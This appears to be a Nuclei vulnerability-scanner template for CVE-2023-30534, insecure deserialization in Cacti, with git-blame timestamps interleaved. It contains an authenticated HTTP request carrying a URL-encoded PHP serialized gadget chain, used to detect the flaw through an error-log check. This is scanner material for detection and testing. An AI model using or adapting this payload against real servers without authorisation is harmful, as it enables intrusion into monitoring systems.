2023-09-13 19:10:39 +00:00
id : CVE-2023-30534
info :
name : Cacti < 1.2.25 Insecure Deserialization
author : k0pak4
2023-12-07 05:21:27 +00:00
severity : medium
2023-09-13 19:10:39 +00:00
description : |
2023-12-07 05:21:27 +00:00
Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
2023-09-13 19:10:39 +00:00
reference :
- https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
2023-12-07 05:21:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-30534
2023-12-07 05:22:08 +00:00
- https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
2023-12-07 05:21:27 +00:00
remediation : This issue has been addressed in version 1.2.25.
2023-09-13 19:10:39 +00:00
classification :
2023-12-07 05:21:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
2023-09-13 19:10:39 +00:00
cvss-score : 4.3
cve-id : CVE-2023-30534
cwe-id : CWE-502
2023-12-07 05:21:27 +00:00
epss-score : 0.00073
epss-percentile : 0.30351
cpe : cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
2023-09-13 19:10:39 +00:00
metadata :
shodan-query : title:"Cacti"
verified : "true"
2023-12-07 05:21:27 +00:00
tags : cve,cve2023,cacti,authenticated
2023-09-13 19:10:39 +00:00
http :
- raw :
- |
2023-12-07 05:21:27 +00:00
GET /index.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host : {{Hostname}}
- |
2023-12-07 05:21:27 +00:00
POST /index.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
2023-12-07 05:21:27 +00:00
2023-09-13 19:10:39 +00:00
- |
2023-12-07 05:21:27 +00:00
POST /managers.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
2023-12-07 05:21:27 +00:00
2023-09-13 19:10:39 +00:00
- |
2023-12-07 05:21:27 +00:00
GET /clog.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : regex
part : body_4
regex :
- "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
condition : and
- type : status
status :
- 200
extractors :
- type : regex
name : csrf_token
part : body
group : 1
regex :
- "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
2023-12-07 05:21:27 +00:00
internal : true